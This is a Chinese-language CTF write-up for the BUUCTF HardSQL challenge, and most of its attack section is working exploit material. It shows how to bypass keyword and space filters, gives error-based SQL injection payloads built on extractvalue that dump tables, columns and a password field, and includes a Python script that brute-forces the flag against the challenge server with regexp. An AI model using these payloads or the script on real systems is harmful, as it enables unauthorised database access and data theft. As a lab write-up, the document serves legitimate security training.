BUU26 [极客大挑战 2019]HardSQL1

输入一些SQL关键词,发现空格,=,union,and,by都被过滤了

=被过滤,就用like替代

发现登录成功,可以注入

报错注入

注意

1.这里过滤了空格,就用()将内容包裹起来

比如说:select table_name from information_schema.tables

就可以换成:select(table_name)from(information_schema.tables)

2.过滤了=,where(table_name='geek')语句中的 = 就被过滤了,此时可以用 like 代替:

where(table_name)like('geek')

爆库名:

1'or(extractvalue(1,concat(0x7e,(select(database())))))#

爆表名:

1'or(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema

)like('geek')),0x7e)))#

爆列名:这里限制条件只用写table_name=' H4rDsq1**'就行了,因为and被过滤了**

这里注意是(' H4rDsq1**')**

1'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)

where(table_name)like('H4rDsq1')),0x7e)))#

爆password:这里就必须写( H4rDsq1**)**

1'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)),0x7e)))#

但是显示不完整

发现substr也被过滤了,所以使用right或者regexp

right:

1'or(extractvalue(1,concat(0x7e,(select(right(password,20))from(H4rDsq1)),0x7e)))#

拼接起来

regexp:

regexp 是 SQL 中的正则表达式匹配运算符

url地址是直接复制的地址栏的地址,所以存在的都是编码后的字符,其原始语句为:1'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)where(password)regexp('^f')),0x7e)))#【筛选出 H4rDsq1 表中 password 字段以 'f' 开头的记录】,可用payload:1'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)where(password)regexp('^flag{5e0eabdd-83c3-466f-9e51-bb95d91d23ad}')),0x7e)))#,验证正则匹配方式的正确性,脚本如下:

正则表达式中,^f表示匹配字符串以 f 开头

python 复制代码
import requests  #requests 模块用于发送 HTTP 请求,与目标服务器进行交互。
import time      #time 模块用于添加延迟,避免请求过于频繁导致服务器拒绝。
#去掉了大写字母,可手动加上,ABCDEFGHIJKLMNOPQRSTUVWXYZ
#未写停止判断,当判断到strings最后一位且flag未在其中时停止即可
strings = 'abcdefghijklmnopqrstuvwxyz1234567890{}-_~' #定义了可能出现在 flag 中的字符集
i = 1
flag = ''  #flag 用于存储已经猜测到的部分 flag,初始为空字符串。
while i < 80:
    for one_char in strings:
        one_char = flag + one_char#先把已经猜好的和新遍历的字符拼接起来
        url = "http://4538af48-5b3e-451e-b6bf-565049f2caab.node4.buuoj.cn:81/check.php?username=12&password=1%27or%28extractvalue%281%2Cconcat%280x7e%2C%28select%28password%29from%28H4rDsq1%29where%28password%29regexp%28%27%5E"+str(one_char)+"%27%29%29%2C0x7e%29%29%29%23"
        #将one_char转换成字符串,以这个新猜的字符串为开头看看能不能匹配上真正的flag
        #如果能匹配上,它会返回匹配上的flag{xxxxxxxx}
        #(因为本意是查询有没有符合条件的字符串),所以回显的文本里会有flag字样
        time.sleep(0.05) #暂停 0.05 秒,避免请求过于频繁。
        rs = requests.get(url)
        if 'flag' in rs.text:   #如果响应文本中包含 'flag',说明当前猜测的部分 flag 是正确的,
            flag = one_char
            print("\r", end="") #\r回车
            print('flag为:' + flag, end='')
            break

参考:[极客大挑战 2019]HardSQL-1 - upfine - 博客园

相关推荐
lypzcgf9 分钟前
Coze源码分析-资源库-删除数据库-后端源码-安全与错误处理
数据库·安全·coze·coze源码分析·智能体平台·ai应用平台·agent平台
黄焖鸡能干四碗2 小时前
企业信息化建设总体规划设计方案
大数据·运维·数据库·人工智能·web安全
Zz_waiting.3 小时前
利用 MyBatis 操作数据库完善案例
数据库·mybatis·案例demo
Z_z在努力3 小时前
【MySQL 高阶】MySQL 架构与存储引擎全面详解
数据库·mysql·架构
全栈工程师修炼指南3 小时前
DBA | MySQL 数据库基础查询语句学习实践笔记
数据库·笔记·学习·mysql·dba
zandy10113 小时前
衡石HQL深度解析:如何用类SQL语法实现跨源数据的高效联邦查询?
数据库·数据仓库·sql·hql·数据湖仓一体
野犬寒鸦3 小时前
今日面试之项目拷打:锁与事务的深度解析
java·服务器·数据库·后端
阿沁QWQ4 小时前
使用c语言连接数据库
数据库
奥尔特星云大使4 小时前
mysql重置管理员密码
linux·运维·数据库·mysql·centos
Lbwnb丶4 小时前
p6spy 打印完整sql
java·数据库·sql